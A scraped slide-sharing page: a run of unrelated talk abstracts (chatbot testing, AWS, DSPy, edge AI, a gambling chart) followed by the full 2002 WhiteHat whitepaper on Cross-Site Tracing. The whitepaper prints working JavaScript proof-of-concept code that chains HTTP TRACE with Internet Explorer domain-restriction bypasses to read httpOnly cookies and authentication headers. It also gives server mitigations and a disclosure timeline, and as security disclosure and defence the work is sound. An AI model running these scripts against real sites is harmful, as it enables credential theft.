Conversational agents, or chatbots, are increasingly used to access all sorts of services using natural language. While open-domain chatbots - like ChatGPT - can converse on any topic, task-oriented chatbots - the focus of this paper - are designed for specific tasks, like booking a flight, obtaining customer support, or setting an appointment. Like any other software, task-oriented chatbots need to be properly tested, usually by defining and executing test scenarios (i.e., sequences of user-chatbot interactions). However, there is currently a lack of methods to quantify the completeness and strength of such test scenarios, which can lead to low-quality tests, and hence to buggy chatbots.
To fill this gap, we propose adapting mutation testing (MuT) for task-oriented chatbots. To this end, we introduce a set of mutation operators that emulate faults in chatbot designs, an architecture that enables MuT on chatbots built using heterogeneous technologies, and a practical realisation as an Eclipse plugin. Moreover, we evaluate the applicability, effectiveness and efficiency of our approach on open-source chatbots, with promising results.
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfChart Kalyan
A Mix Chart displays historical data of numbers in a graphical or tabular form. The Kalyan Rajdhani Mix Chart specifically shows the results of a sequence of numbers over different periods.
Generating privacy-protected synthetic data using Secludy and MilvusZilliz
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
Have you ever been confused by the myriad of choices offered by AWS for hosting a website or an API?
Lambda, Elastic Beanstalk, Lightsail, Amplify, S3 (and more!) can each host websites + APIs. But which one should we choose?
Which one is cheapest? Which one is fastest? Which one will scale to meet our needs?
Join me in this session as we dive into each AWS hosting service to determine which one is best for your scenario and explain why!
Discover top-tier mobile app development services, offering innovative solutions for iOS and Android. Enhance your business with custom, user-friendly mobile applications.
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...Jason Yip
The typical problem in product engineering is not bad strategy, so much as “no strategy”. This leads to confusion, lack of motivation, and incoherent action. The next time you look for a strategy and find an empty space, instead of waiting for it to be filled, I will show you how to fill it in yourself. If you’re wrong, it forces a correction. If you’re right, it helps create focus. I’ll share how I’ve approached this in the past, both what works and lessons for what didn’t work so well.
Main news related to the CCS TSI 2023 (2023/1695)Jakub Marek
An English 🇬🇧 translation of a presentation to the speech I gave about the main changes brought by CCS TSI 2023 at the biggest Czech conference on Communications and signalling systems on Railways, which was held in Clarion Hotel Olomouc from 7th to 9th November 2023 (konferenceszt.cz). Attended by around 500 participants and 200 on-line followers.
The original Czech 🇨🇿 version of the presentation can be found here: https://www.slideshare.net/slideshow/hlavni-novinky-souvisejici-s-ccs-tsi-2023-2023-1695/269688092 .
The videorecording (in Czech) from the presentation is available here: https://youtu.be/WzjJWm4IyPk?si=SImb06tuXGb30BEH .
Programming Foundation Models with DSPy - Meetup SlidesZilliz
Prompting language models is hard, while programming language models is easy. In this talk, I will discuss the state-of-the-art framework DSPy for programming foundation models with its powerful optimizers and runtime constraint system.
For the full video of this presentation, please visit: https://www.edge-ai-vision.com/2024/06/temporal-event-neural-networks-a-more-efficient-alternative-to-the-transformer-a-presentation-from-brainchip/
Chris Jones, Director of Product Management at BrainChip , presents the “Temporal Event Neural Networks: A More Efficient Alternative to the Transformer” tutorial at the May 2024 Embedded Vision Summit.
The expansion of AI services necessitates enhanced computational capabilities on edge devices. Temporal Event Neural Networks (TENNs), developed by BrainChip, represent a novel and highly efficient state-space network. TENNs demonstrate exceptional proficiency in handling multi-dimensional streaming data, facilitating advancements in object detection, action recognition, speech enhancement and language model/sequence generation. Through the utilization of polynomial-based continuous convolutions, TENNs streamline models, expedite training processes and significantly diminish memory requirements, achieving notable reductions of up to 50x in parameters and 5,000x in energy consumption compared to prevailing methodologies like transformers.
Integration with BrainChip’s Akida neuromorphic hardware IP further enhances TENNs’ capabilities, enabling the realization of highly capable, portable and passively cooled edge devices. This presentation delves into the technical innovations underlying TENNs, presents real-world benchmarks, and elucidates how this cutting-edge approach is positioned to revolutionize edge AI across diverse applications.
In the realm of cybersecurity, offensive security practices act as a critical shield. By simulating real-world attacks in a controlled environment, these techniques expose vulnerabilities before malicious actors can exploit them. This proactive approach allows manufacturers to identify and fix weaknesses, significantly enhancing system security.
This presentation delves into the development of a system designed to mimic Galileo's Open Service signal using software-defined radio (SDR) technology. We'll begin with a foundational overview of both Global Navigation Satellite Systems (GNSS) and the intricacies of digital signal processing.
The presentation culminates in a live demonstration. We'll showcase the manipulation of Galileo's Open Service pilot signal, simulating an attack on various software and hardware systems. This practical demonstration serves to highlight the potential consequences of unaddressed vulnerabilities, emphasizing the importance of offensive security practices in safeguarding critical infrastructure.
Skybuffer SAM4U tool for SAP license adoptionTatiana Kojar
Manage and optimize your license adoption and consumption with SAM4U, an SAP free customer software asset management tool.
SAM4U, an SAP complimentary software asset management tool for customers, delivers a detailed and well-structured overview of license inventory and usage with a user-friendly interface. We offer a hosted, cost-effective, and performance-optimized SAM4U setup in the Skybuffer Cloud environment. You retain ownership of the system and data, while we manage the ABAP 7.58 infrastructure, ensuring fixed Total Cost of Ownership (TCO) and exceptional services through the SAP Fiori interface.
1. CROSS-SITE TRACING (XST)
THE NEW TECHNIQUES AND EMERGING THREATS TO BYPASS CURRENT WEB SECURITY MEASURES USING TRACE AND XSS.
Jeremiah Grossman
//
3. Overview
October 23 2002, Microso issued a press release describing a new browser/server based protective security measure within of internet explorer 6 sp1. is new feature, dubbed “httponly”, helps guard http cookies against xss (cross-site scripting) attack. WhiteHat Security, heavily focused on web application security research and technology, began to investigate the feature in order to determine what it meant to web security. First of all, anything that attempts to help prevent the xss plague on the web is a good thing. Most of us in the web application security field already know the great pains required to prevent the ever-present existence of xss issues.
Aer much security review, I posted to bugtraq stating that the new httpOnly security feature, which is nicely effective for the intended purpose, is limited in xss protection scope. Limited in that the security feature only prohibits the exposure of cookie data through the “document.cookie” object. However, Microso has taken an excellent first step in the right direction to prevent xss as a whole.
A week later into testing of httpOnly, WhiteHat staff discovered a new web security attack technique that is able not only to bypass the httpOnly mechanism present in i.e. 6 service pack 1, but in addition the ability to xss “just about” anything from “just about” anywhere. is technique allows client-side scripting languages, such as javascript, and possibly other client-side technologies like vbscript, flash, java, etc., the ability access http web authentication credentials, with the added bonus of achieving this result over ssl. is ability has never before been previously possible. ese new exposures will be explained with detail in the proceeding sections to illustrate the concepts.
4. Background Information
TRACE Request Method
“Trace” is used simply as an input data echo mechanism for the http protocol. is request method is commonly used for debug and other connection analysis activities.
e http trace request (containing request line, headers, post data), sent to a trace supporting web server, will respond to the client with the information contained in the request. Trace provides any easy to way to tell what an http client is sending and what the server is receiving. Apache, IIS, and iPlanet all support trace as defined by the HTTP/1.1 RFC and is currently enabled by default. Very few system administrators have disabled this request method either because the method posed no known risk, default settings were considered good enough or simply had no option to do so.
e following is an example of a TRACE request:
$ telnet foo.com 80
Trying 127.0.0.1...
Connected to foo.bar.
Escape character is ‘^]’.
TRACE / HTTP/1.1
Host: foo.bar
X-Header: test
HTTP/1.1 200 OK
Date: Mon, 02 Dec 2002 19:24:51 GMT
Server: Apache/2.0.40 (Unix)
Content-Type: message/http
TRACE / HTTP/1.1
Host: foo.bar
X-Header: test
As shown in the example, the server responded with the information sent by the client to the server. What sites currently have TRACE enabled?
• www.passport.com
• www.yahoo.com
• www.disney.com
• www.securityfocus.com
• www.redhat.com
• www.go.com
• www.theregister.co.uk
• www.sun.com
• www.oracle.com
• www.ibm.com
(Many other web sites)
httpOnly Cookie Option
httpOnly is a HTTP Cookie option used to inform the browser (IE 6 only until other browsers support httpOnly) not to allow scripting languages (JavaScript, VBScript, etc.) access to the “document.cookie” object (normal XSS attack target). e syntax of an httpOnly cookie is as follows:
5. Set-Cookie: name=value; httpOnly
Using JavaScript we can test the effectiveness of the feature. (Code tested in IE 6 SP1)
<script type=”text/javascript”>
<!--
function normalCookie() {
document.cookie = “TheCookieName=CookieValue_httpOnly”;
alert(document.cookie);
}
function httpOnlyCookie() {
document.cookie = “TheCookieName=CookieValue_httpOnly; httpOnly”;
alert(document.cookie);
}
//-->
</script>
<FORM>
<INPUT TYPE=BUTTON OnClick=”normalCookie();” VALUE=’Display Normal Cookie’>
<INPUT TYPE=BUTTON OnClick=”httpOnlyCookie();” VALUE=’Display HTTPONLY Cookie’>
</FORM>
Code Example 1.
Screen Shot 1: aer pressing the “Display Normal Cookie” button.
Screen Shot 2 : Aer pressing the “Display HTTPONLY Cookie’” button.
By testing the above code, you can quickly see that when httpOnly setting is in use, the “document.cookie” function allows access to the object, but the string returns empty. is becomes a useful security enhancement for many web applications.
6. Analysis
e first challenge is to gain access to the cookie data string normally contained in “document.cookie” while httpOnly is in use. e idea became to identify where the data within “document.cookie” is located besides within, of course, “document.cookie”. is is where TRACE’s usefulness for our purposes becomes clear. TRACE will echo the information you send in the HTTP Request. is includes cookie and Web Authentication strings, since they are just simple HTTP headers themselves.
However, it is not a simple process forcing Internet Explorer to send a TRACE request, even while first considering the use HTML Form (METHOD=POST). In fact, Internet Explorer does not support request methods other than GET or POST while using an HTML form. To resolve this limitation, we had to utilize extended client-side scripting technologies to create and send a specially formatted HTTP request to a target web server. Many technologies are capable of performing specially craed HTTP request.
<script type=”text/javascript”>
<!--
function sendTrace () {
var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”);
xmlHttp.open(“TRACE”, “http://foo.bar”,false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;
alert(xmlDoc);
}
//-->
</script>
<INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request”>
Code Example 2. (Will need to change the URL in the code) Screen Shot 3: Results of the TRACE request response from the server. Note the cookie string contained and accessible by means other than “document.cookie”.
7. e above code, using the ActiveX control XMLHTTP, will send a TRACE request to the target web server. e server will then echo, if it supports TRACE, the information sent within the HTTP request. Internet Explorer will send general browser headers by default that will be displayed via a resulting JavaScript alert window. If your browser happens to have a cookie from the target domain or is logged into the target web server using web authentication, you will be able to see your cookies and credentials present within the alert. is technique successfully grants the code ability bypass “httpOnly”, while accessing cookie data without the use of “document.cookie”. We now have the desired capability to pass sensitive credentials off-domain to a third-party. Also as stated in the overview, the ability to access web authentication credentials not before possible using client-side script. To restate, all the sensitive information is still accessible even over an SSL link.
It is important to note two things at this point. e first is ability to do these types of request using a web browser is NOT limited to Internet Explorer. Other web browsers such as Mozilla/Netscape possess the ability as well. Specifically, TRACE requests have been achieved in Mozilla using XMLDOM object scripting. e second, XMLHTTP, is only one of several ActiveX controls and other technologies, which appear have this control over HTTP within a browser environment.
ere is however at this point a limiting factor preventing wider a danger escalation. e TRACE connection made by the browser, will NOT be allowed by the browser, to connect to anything other than the domain hosting the actual script content. A foo.bar script domain will only be able to TRACE and connect to a foo.bar domain host. is is a browser implemented domain restriction security policy. e domain restriction policy helps prevent XSS and other similar attacks from occurring. is technical exploit limitation does prevent further abuse, however, this hurdle can be bypassed as well as shown below.
To increase the exposure of the exploit, we are in need of a domain-restriction-bypass vulnerability within Internet Explorer (or web browser of choice). As it turns out, these issues are quite numerous and can be commonly found posted to public resource forums such as bugtraq. Recently and currently, there have been known unresolved issue with the IE Domain Restriction policies. ese un-patched Internet Explorer 6 flaws, allow the ability to bypass the domain restriction security policy, and increase the overall severity of the problem. is IE issue uses the “external” browser flaw in the caching mechanism. And was first identified by GreyMagic Security.
8. <script type=”text/javascript”>
<!--
function xssDomain() {
var oWin=open(“blank.html”,”victim”,”width=500,height=400”);
var oVuln=oWin.external;
oWin.location.href=”http://foo.bar”;
setTimeout(
function () {
oVuln.NavigateAndFind(‘javascript:xmlHttp=new ActiveXObject(“Microsoft.XMLHTTP”);xmlHttp.open(“TRACE”,”http://foo.bar”,false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(“Show all headers for foo.com including cookie without using document.cookie n” + xmlDoc);’,””,””);
},
2000
);
}
//-->
</script>
<INPUT TYPE=BUTTON OnClick=”xssDomain();” VALUE=’TRACE XSS Domain’>
Code Example 3. (Code will not work post the MS02-068 roll-up which resolves the issue). However a working code example (4) below, as of this writing, does function. URLs in the code will need to be changed to identify a target.
<script type=”text/javascript”>
function xssDomainTraceRequest(){
var exampleCode = “var xmlHttp = new ActiveXObject( ”Microsoft.XMLHTTP”);xmlHttp.open(”TRACE”,”http://foo.bar”,false) ;xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(xmlDoc);”;
var target = “http://foo.bar”;
cExampleCode = encodeURIComponent(exampleCode + ‘;top.close()’);
var readyCode = ‘font-size:expression(execScript(decodeURIComponent(“’ + cExampleCode + ‘”)))’;
showModalDialog(target, null, readyCode);
}
</script>
<INPUT TYPE=BUTTON OnClick=”xssDomainTraceRequest()” VALUE=”Show Cookie Information Using TRACE”>
Code Example 4. (Functional as of this writing) is IE issue uses a flaw within “showModalDialog”. Gathered from or Larholm on http://www.pivx.com/ e URLs in the code will need to be changed to identify a target.
9. Screen Shot 4: Results of the TRACE request response from the server. Note the base64 authentication string contained and now accessible.
ese scripts now have the ability to connect to any domain, access cookies, and web authentication information, while NOT utilizing document.cookie and/or being restricted by domain security policy. What does this mean for exposure scenarios? Read On.
10. Exposure Scenarios
We will outline a few exposure scenarios while using varying degrees of security assumptions. Attempting to organize the scenarios by level of risk severity.
Defining some necessary technologies and acronyms to better understand exposure at several levels.
Domain Restriction Bypass (DRB) e ability for a client-side script to bypass domain restriction security policy enabled within a web browser.
HTTP Request Enabling Technology (HRET) Client-side technologies resident within a web browser, which allow for the creation and sending of specially formatted HTTP Requests. ese technologies may include, but not all confirmed, JavaScript, VBScript, Flash, Java, ActiveX, Jscript, Action Script, Shockwave, etc..
TRACE Method Support (TMS) A target web server that currently supports the TRACE request method.
“Credentials” will include cookie data and web authentication credentials.
Scenarios assume the following:
A user visits a malicious web site or views malicious content hosted by a trusted source (message board, web mail, etc..) and loads code similar to code example 3 & 4.
Scenario 1. (DRB, HRET, TMS)
All the required insecurities are present in today’s environment. Code may access any and all of the user credentials from any domain that supports TRACE including bypass httpOnly. XSS “just about” anyone from “just about anywhere”.
Scenario 2. (HRET, TMS)
Code may access any and all of the user credentials from the “hosting code” domain including bypass httpOnly.
Scenario 3. (DRB, HRET)
User credentials from target domain are safe due to the server not supporting or disallowing TRACE. However, other security concerns beyond the scope of this paper are present.
Scenario 4. (HRET)
User credentials from target domain are safe due to the server not supporting or disallowing TRACE. No other security concerns beyond the scope of this paper persist.
11. General Recommendations
1. Sufficiently patch all web browsers against known domain restriction bypass flaws. is is a more important part of security policy now more than ever.
2. Disable or disallow the TRACE Request method on production and development (unless needed) web servers.
3. Web server vendors should update their web server packages to disable TRACE by default.
4. Web server vendors should inform their users on how to disable or disallow TRACE on existing web servers.
5. ActiveX controls supporting arbitrary HTTP request should be marked unsafe for scripting by default. Other such technology vendors (Flash, Java, Shockwave, VBScript, etc..) should attempt to implement greater security mechanisms regarding disallowing unauthorized HTTP requests.
6. Users have the ability to disable all active scripting and increase the safety of their credentials. However, this may negatively impact the functionality of many web sites.
12. Server Specific Recommendations
(Resolutions should be confirmed by appropriate vendor)
IIS
• URL Scan
Apache
• Source Code Modification
• Mod_Rewrite Module
RewriteEngine onRewriteCond %{REQUEST_METHOD} ^TRACERewriteRule .* – [F]
(ank you to Rain Forest Puppy)
** e Limit or LimitExcept directive in the httpd.conf file does not appear to be able to restrict TRACE. **
Netscape iPlanet
(Procedures for removing unwanted Request Methods)
cd ${IPLANET_ROOT}
mkdir secure_lib
cp bin/https/lib/libns-httpd40.so secure_lib
cd secure_lib
emacs libnc-httpd40.so
e supported methods appear in lists like: HEAD^@GET^@PUT^@POST^@DELETE^ @TRACE^@OPTIONS^@MOVE^@INDEX^@MKDIR^@RMDIR
• Find all occurrences of these lists and change the methods as required to be GET padded with spaces to match the length of the word. I.e. DELETE becomes ‘GET ‘ (three spaces)
• edit the start script for the web server to protect and prepend the secure_lib at the front of the LD_LIBRARY_PATH. i.e. LD_LIBRARY_PATH=${IPLANET_ROOT}/secure_lib:
<the rest of the line as it appears in the script>
• re-start the web server and test it still works!
(Many thanks to Alastair Davie and Robert Rodger.)
13. References
Some Answered Questions.
Q: Does this affect only Internet Explorer?
A: No, this new technique may affect all browser supporting HTTP Request Enabling Technologies (HRET).
Q: Does this exploit technique require ActiveX?
A: ActiveX is used in our examples, however research has shown other similar technologies posses the same abilities.
Q: If I turn off Active Scripting, as a user, am I safe?
A: You could be “safer” but not safe. As previously said, other technologies such as Flash and Java may still pose a threat even if Active Scripting is disabled.
Q: As a web server administrator, if I disable TRACE are my users credentials safe?
A: Yes, this appears to be the case. Users of your “domain” would be safe against this new technique since your web server no longer echoes sensitive information in TRACE requests.
Q: Are my users credentials at risk even though my applications are not vulnerable to XSS at the application layer?
A: Yes. e particular attack vector of this XSS issue targets the web server itself rather than the web application layer.
Q: Why should I have to reconfigure my web server, this sounds like a browser client-side issue?
A: e security of the web browsers in use should be indeed secured as well as the web server. However, if the web server itself is not configured to deny TRACE, then the security of the domain credentials will reside in the security of the web browser. Not a good idea.
14. Issue Discovery & Disclosure Time line
November 1, 2002.
httpOnly bypass issue identified.
November 28, 2002.
Increased Exposure identified.
December 4, 2002.
Issue disclosed and confirmed by Tim Mullen
December 4, 2002.
Issue disclosed and confirmed by Ryan Russell
December 5, 2002.
Issue disclosed and confirmed by Steve Christey (Mitre)
December 6, 2002.
Issue disclosed and confirmed by Rain Forest Puppy (Wiretrip.net)
December 10, 2002.
Issue disclosed and confirmed by CERT.
January 20, 2003.
Issue publicly disclosed by WhiteHat.
Credits & anks
Robert Auger: For help with security research, vulnerability identification, and mirror help.
Rain Forest Puppy: For help with vulnerability confirmation, security resolutions research and the XST title.
Tim Mullen: For help with vulnerability confirmation and security resolutions
Steve Christey: For help with vulnerability confirmation and feedback
Ryan Russell: For help with vulnerability confirmation
Robert Rodger: For help with iPlanet vulnerability confirmation and remediation
Alastair Davie: For help with iPlanet vulnerability confirmation and remediation